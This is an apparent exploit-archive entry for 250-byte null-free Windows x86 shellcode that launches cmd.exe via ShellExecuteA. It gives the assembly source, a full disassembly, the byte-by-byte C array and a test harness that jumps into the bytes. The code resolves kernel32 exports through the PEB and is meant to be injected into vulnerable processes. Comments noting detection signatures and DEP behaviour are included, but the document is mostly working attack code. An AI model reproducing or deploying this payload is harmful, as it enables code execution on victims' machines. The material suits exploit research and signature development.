Windows/x86 - ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) Shellcode (250 bytes)
/* # Title : Windows x86 ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1) shellcode # Date : 22-06-2016 # Author : Roziul Hasan Khan Shifat # Tested on : Windows 7,10 x86 */ /* section .text global _start _start: xor ecx,ecx mov eax,[fs:ecx+0x30] ;EAX=PEB mov eax,[eax+0xc] ;EAX=PEB->Ldr mov esi,[eax+0x14] ;ESI=PEB->Ldr.InMemOrderModuleList lodsd ; EAX=ntdll.dll xchg eax,esi ;EAX=ESI , ESI=EAX lodsd ; EAX=Third(kernel32) mov ebx,[eax+0x10] ;PVOID Dllbase (base address) ;------------------------------- mov edx,[ebx+0x3c] ;(kernel32.dll base address+0x3c)=DOS->e_lfanew add edx,ebx ;(DOS->e_lfanew+kernel32.dll base address)=PE Header mov edx,[edx+0x78] ;(PE Header+0x78)=DataDirectory->VirtualAddress add edx,ebx ;(DataDirectory->VirtualAddress+kernel32.dll base address)=export table of kernel32.dll(IMAGE_EXPORT_DIRECTORY) mov esi,[edx+0x20]; (IMAGE_EXPORT_DIRECTORY+0x20)=AddressOfNames add esi,ebx ;ESI=(AddressOfNames+kernel32.dll base address)=kernel32 AddressOfNames xor ecx,ecx ;----------------------- Get_func: inc ecx ;increment the ordinal lodsd ;Get name offset add eax,ebx ;(offset+kernel32.dll base adress)=Get function name cmp dword [eax],0x50746547 ;GetP jnz Get_func cmp dword [eax+0x4],0x41636f72 ;rocA jnz Get_func cmp dword [eax+0x8],0x65726464 ;ddre jnz Get_func ;--------------------- mov esi,[edx+0x24] ;(IMAGE_EXPORT_DIRECTORY+0x24) AddressOfNameOrdinals add esi,ebx ;ESI=(AddressOfNameOrdinals+kernel32.dll)=AddressOfNameOrdinals of kernel32.dll mov cx,[esi+ecx*2] ;CX=Number of Function dec ecx mov esi,[edx+0x1c] ; (IMAGE_EXPORT_DIRECTORY+0x1c)=AddressOfFunctions add esi,ebx ;ESI=beginning of Address table mov edx,[esi+ecx*4];EDX=Pointer(offset) add edx,ebx ;Edx=GetProcAddress ;----------------------------- xor esi,esi mov esi,edx ;backup of GetProcAddress xor edi,edi mov edi,ebx ;-------------- ;finding address of LoadLibraryA() xor ecx,ecx push ecx push 0x41797261 push 0x7262694c push 0x64616f4c push esp push ebx ;address of kernel32.dll call edx add esp,12 
;----------------- xor ecx,ecx ;finding address of ExitProcess push 0x42737365 mov [esp+3],cl push 0x636f7250 push 0x74697845 push esp push edi xor edi,edi mov edi,eax call esi ;---------------------------- add esp,12 ;LoadLibraryA("shell32.dll") xor ecx,ecx push ecx push 0x416c6c64 mov [esp+3],cl push 0x2e32336c push 0x6c656873 push esp xor edx,edx mov edx,edi ;Edx=LoadLibraryA mov edi,eax ;edi=ExitProcess call edx add esp,11 ;------------------ ;finding address of ShellExecuteA() xor ecx,ecx push 0x42424241 mov [esp+1],cl push 0x65747563 push 0x6578456c push 0x6c656853 push esp push eax call esi ;------------------- ;ShellExecuteA(NULL,NULL,"cmd.exe",NULL,NULL,1); add esp,13 xor ecx,ecx push 0x41657865 mov [esp+3],cl push 0x2e646d63 push esp pop ecx xor edx,edx inc edx push edx xor edx,edx push edx push edx push ecx push edx push edx call eax call edi */ /* Disassembly of section .text: 00401000 <_start>: 401000: 31 c9 xor %ecx,%ecx 401002: 64 8b 41 30 mov %fs:0x30(%ecx),%eax 401006: 8b 40 0c mov 0xc(%eax),%eax 401009: 8b 70 14 mov 0x14(%eax),%esi 40100c: ad lods %ds:(%esi),%eax 40100d: 96 xchg %eax,%esi 40100e: ad lods %ds:(%esi),%eax 40100f: 8b 58 10 mov 0x10(%eax),%ebx 401012: 8b 53 3c mov 0x3c(%ebx),%edx 401015: 01 da add %ebx,%edx 401017: 8b 52 78 mov 0x78(%edx),%edx 40101a: 01 da add %ebx,%edx 40101c: 8b 72 20 mov 0x20(%edx),%esi 40101f: 01 de add %ebx,%esi 401021: 31 c9 xor %ecx,%ecx 00401023 <Get_func>: 401023: 41 inc %ecx 401024: ad lods %ds:(%esi),%eax 401025: 01 d8 add %ebx,%eax 401027: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) 40102d: 75 f4 jne 401023 <Get_func> 40102f: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) 401036: 75 eb jne 401023 <Get_func> 401038: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) 40103f: 75 e2 jne 401023 <Get_func> 401041: 8b 72 24 mov 0x24(%edx),%esi 401044: 01 de add %ebx,%esi 401046: 66 8b 0c 4e mov (%esi,%ecx,2),%cx 40104a: 49 dec %ecx 40104b: 8b 72 1c mov 0x1c(%edx),%esi 40104e: 01 de add %ebx,%esi 401050: 8b 14 8e mov 
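(%esi,%ecx,4),%edx
 401053: 01 da                add %ebx,%edx
 401055: 31 f6                xor %esi,%esi
 401057: 89 d6                mov %edx,%esi
 401059: 31 ff                xor %edi,%edi
 40105b: 89 df                mov %ebx,%edi
 40105d: 31 c9                xor %ecx,%ecx
 40105f: 51                   push %ecx
 401060: 68 61 72 79 41       push $0x41797261
 401065: 68 4c 69 62 72       push $0x7262694c
 40106a: 68 4c 6f 61 64       push $0x64616f4c
 40106f: 54                   push %esp
 401070: 53                   push %ebx
 401071: ff d2                call *%edx
 401073: 83 c4 0c             add $0xc,%esp
 401076: 31 c9                xor %ecx,%ecx
 401078: 68 65 73 73 42       push $0x42737365
 40107d: 88 4c 24 03          mov %cl,0x3(%esp)
 401081: 68 50 72 6f 63       push $0x636f7250
 401086: 68 45 78 69 74       push $0x74697845
 40108b: 54                   push %esp
 40108c: 57                   push %edi
 40108d: 31 ff                xor %edi,%edi
 40108f: 89 c7                mov %eax,%edi
 401091: ff d6                call *%esi
 401093: 83 c4 0c             add $0xc,%esp
 401096: 31 c9                xor %ecx,%ecx
 401098: 51                   push %ecx
 401099: 68 64 6c 6c 41       push $0x416c6c64
 40109e: 88 4c 24 03          mov %cl,0x3(%esp)
 4010a2: 68 6c 33 32 2e       push $0x2e32336c
 4010a7: 68 73 68 65 6c       push $0x6c656873
 4010ac: 54                   push %esp
 4010ad: 31 d2                xor %edx,%edx
 4010af: 89 fa                mov %edi,%edx
 4010b1: 89 c7                mov %eax,%edi
 4010b3: ff d2                call *%edx
 4010b5: 83 c4 0b             add $0xb,%esp
 4010b8: 31 c9                xor %ecx,%ecx
 4010ba: 68 41 42 42 42       push $0x42424241
 4010bf: 88 4c 24 01          mov %cl,0x1(%esp)
 4010c3: 68 63 75 74 65       push $0x65747563
 4010c8: 68 6c 45 78 65       push $0x6578456c
 4010cd: 68 53 68 65 6c       push $0x6c656853
 4010d2: 54                   push %esp
 4010d3: 50                   push %eax
 4010d4: ff d6                call *%esi
 4010d6: 83 c4 0d             add $0xd,%esp
 4010d9: 31 c9                xor %ecx,%ecx
 4010db: 68 65 78 65 41       push $0x41657865
 4010e0: 88 4c 24 03          mov %cl,0x3(%esp)
 4010e4: 68 63 6d 64 2e       push $0x2e646d63
 4010e9: 54                   push %esp
 4010ea: 59                   pop %ecx
 4010eb: 31 d2                xor %edx,%edx
 4010ed: 42                   inc %edx
 4010ee: 52                   push %edx
 4010ef: 31 d2                xor %edx,%edx
 4010f1: 52                   push %edx
 4010f2: 52                   push %edx
 4010f3: 51                   push %ecx
 4010f4: 52                   push %edx
 4010f5: 52                   push %edx
 4010f6: ff d0                call *%eax
 4010f8: ff d7                call *%edi
*/

#include <stdio.h>
#include <string.h>

/*
 * Raw x86 (32-bit) machine code, 250 bytes, identical to the disassembly
 * above (0x401000..0x4010f9).  Grouped one instruction per line so each
 * byte can be checked against the listing.
 *
 * What the bytes do, as written in the author's assembly comments:
 *   - read fs:[0x30] (PEB) -> Ldr -> InMemoryOrderModuleList and take the
 *     module base recorded as kernel32.dll;
 *   - walk kernel32's export name table comparing 4-byte chunks against
 *     "GetP" (0x50746547), "rocA" (0x41636f72), "ddre" (0x65726464) to
 *     find GetProcAddress, then resolve LoadLibraryA and ExitProcess;
 *   - LoadLibraryA("shell32.dll"), resolve ShellExecuteA, and call
 *     ShellExecuteA(NULL, NULL, "cmd.exe", NULL, NULL, 1);
 *   - call ExitProcess, so control never returns to the caller.
 *
 * The encoding contains no 0x00 byte: every NUL the embedded strings need
 * is written at run time with "mov [esp+N], cl" after "xor ecx, ecx".
 * That is why strlen() below reports the full 250 bytes.
 *
 * Defender notes: the fs:[0x30] PEB read followed by the three hard-coded
 * dword compares above is a well-known static signature for this family
 * of position-independent loaders; LoadLibraryA("shell32.dll") followed by
 * ShellExecuteA("cmd.exe") issued from a non-image memory region is the
 * behavioural indicator.  The stack adjustments after some calls
 * ("add esp, 11" / "add esp, 13") do not restore ESP exactly; this is
 * presumably tolerated because the code ends in ExitProcess.
 */
char shellcode[] =
    "\x31\xc9"                      /* xor ecx,ecx */
    "\x64\x8b\x41\x30"              /* mov eax,[fs:ecx+0x30] */
    "\x8b\x40\x0c"                  /* mov eax,[eax+0xc] */
    "\x8b\x70\x14"                  /* mov esi,[eax+0x14] */
    "\xad\x96\xad"                  /* lodsd ; xchg eax,esi ; lodsd */
    "\x8b\x58\x10"                  /* mov ebx,[eax+0x10] */
    "\x8b\x53\x3c\x01\xda"          /* mov edx,[ebx+0x3c] ; add edx,ebx */
    "\x8b\x52\x78\x01\xda"          /* mov edx,[edx+0x78] ; add edx,ebx */
    "\x8b\x72\x20\x01\xde"          /* mov esi,[edx+0x20] ; add esi,ebx */
    "\x31\xc9"                      /* xor ecx,ecx */
    "\x41\xad\x01\xd8"              /* Get_func: inc ecx ; lodsd ; add eax,ebx */
    "\x81\x38\x47\x65\x74\x50\x75\xf4"          /* cmp [eax],"GetP"   ; jnz */
    "\x81\x78\x04\x72\x6f\x63\x41\x75\xeb"      /* cmp [eax+4],"rocA" ; jnz */
    "\x81\x78\x08\x64\x64\x72\x65\x75\xe2"      /* cmp [eax+8],"ddre" ; jnz */
    "\x8b\x72\x24\x01\xde"          /* mov esi,[edx+0x24] ; add esi,ebx */
    "\x66\x8b\x0c\x4e\x49"          /* mov cx,[esi+ecx*2] ; dec ecx */
    "\x8b\x72\x1c\x01\xde"          /* mov esi,[edx+0x1c] ; add esi,ebx */
    "\x8b\x14\x8e\x01\xda"          /* mov edx,[esi+ecx*4] ; add edx,ebx */
    "\x31\xf6\x89\xd6"              /* xor esi,esi ; mov esi,edx */
    "\x31\xff\x89\xdf"              /* xor edi,edi ; mov edi,ebx */
    "\x31\xc9\x51"                  /* xor ecx,ecx ; push ecx */
    "\x68\x61\x72\x79\x41"          /* push "aryA" */
    "\x68\x4c\x69\x62\x72"          /* push "Libr" */
    "\x68\x4c\x6f\x61\x64"          /* push "Load" */
    "\x54\x53\xff\xd2"              /* push esp ; push ebx ; call edx */
    "\x83\xc4\x0c"                  /* add esp,12 */
    "\x31\xc9"                      /* xor ecx,ecx */
    "\x68\x65\x73\x73\x42"          /* push "essB" */
    "\x88\x4c\x24\x03"              /* mov [esp+3],cl */
    "\x68\x50\x72\x6f\x63"          /* push "Proc" */
    "\x68\x45\x78\x69\x74"          /* push "Exit" */
    "\x54\x57"                      /* push esp ; push edi */
    "\x31\xff\x89\xc7"              /* xor edi,edi ; mov edi,eax */
    "\xff\xd6"                      /* call esi */
    "\x83\xc4\x0c"                  /* add esp,12 */
    "\x31\xc9\x51"                  /* xor ecx,ecx ; push ecx */
    "\x68\x64\x6c\x6c\x41"          /* push "dllA" */
    "\x88\x4c\x24\x03"              /* mov [esp+3],cl */
    "\x68\x6c\x33\x32\x2e"          /* push "l32." */
    "\x68\x73\x68\x65\x6c"          /* push "shel" */
    "\x54"                          /* push esp */
    "\x31\xd2\x89\xfa"              /* xor edx,edx ; mov edx,edi */
    "\x89\xc7"                      /* mov edi,eax */
    "\xff\xd2"                      /* call edx */
    "\x83\xc4\x0b"                  /* add esp,11 */
    "\x31\xc9"                      /* xor ecx,ecx */
    "\x68\x41\x42\x42\x42"          /* push "ABBB" */
    "\x88\x4c\x24\x01"              /* mov [esp+1],cl */
    "\x68\x63\x75\x74\x65"          /* push "cute" */
    "\x68\x6c\x45\x78\x65"          /* push "lExe" */
    "\x68\x53\x68\x65\x6c"          /* push "Shel" */
    "\x54\x50\xff\xd6"              /* push esp ; push eax ; call esi */
    "\x83\xc4\x0d"                  /* add esp,13 */
    "\x31\xc9"                      /* xor ecx,ecx */
    "\x68\x65\x78\x65\x41"          /* push "exeA" */
    "\x88\x4c\x24\x03"              /* mov [esp+3],cl */
    "\x68\x63\x6d\x64\x2e"          /* push "cmd." */
    "\x54\x59"                      /* push esp ; pop ecx */
    "\x31\xd2\x42\x52"              /* xor edx,edx ; inc edx ; push edx */
    "\x31\xd2\x52\x52\x51\x52\x52"  /* xor edx,edx ; push edx x2 ; push ecx ; push edx x2 */
    "\xff\xd0"                      /* call eax */
    "\xff\xd7";                     /* call edi */

/*
 * Test harness: report the byte length, then transfer control into the
 * array through a function-pointer cast.
 *
 * Notes for the reader:
 *   - ISO C does not define converting an object pointer to a function
 *     pointer; GCC accepts it (pedantic warning), which is what the
 *     original relied on.
 *   - `shellcode` is a writable global placed in a data section.  Where
 *     DEP/NX is enforced that section is not executable, so the indirect
 *     call faults instead of running the bytes - the expected outcome on a
 *     hardened build.
 *   - When the bytes do run they end in ExitProcess, so `return 0` is
 *     never reached.
 *
 * Changes from the original: explicit `int main(void)` (implicit int was
 * removed in C99 and is a hard error in C23) and an explicit return.
 */
int main(void)
{
    printf("shellcode length %ld\n", (long)strlen(shellcode));
    ((void (*)(void))shellcode)();
    return 0;   /* not reached when the payload executes (it calls ExitProcess) */
}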